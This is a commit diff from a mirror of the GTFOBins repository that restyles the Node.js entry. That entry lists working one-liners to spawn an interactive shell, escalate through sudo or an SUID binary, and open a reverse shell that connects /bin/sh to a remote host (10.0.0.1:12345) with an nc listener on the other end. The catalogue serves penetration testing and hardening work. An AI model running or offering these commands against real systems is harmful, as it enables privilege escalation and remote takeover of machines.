mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Fix node code style
This commit is contained in:
parent
a2c4dd2965
commit
6e2242d3f1
@ -2,21 +2,21 @@
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", [ "-p" ], { stdio: [0, 1, 2]});'
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
||||
code: |
|
||||
export RHOST=10.0.0.1
|
||||
export RPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh", []);
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
client = new require("net").Socket();
|
||||
client.connect(process.env.RPORT, process.env.RHOST, function(){
|
||||
client.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
|
Loading…
Reference in New Issue
Block a user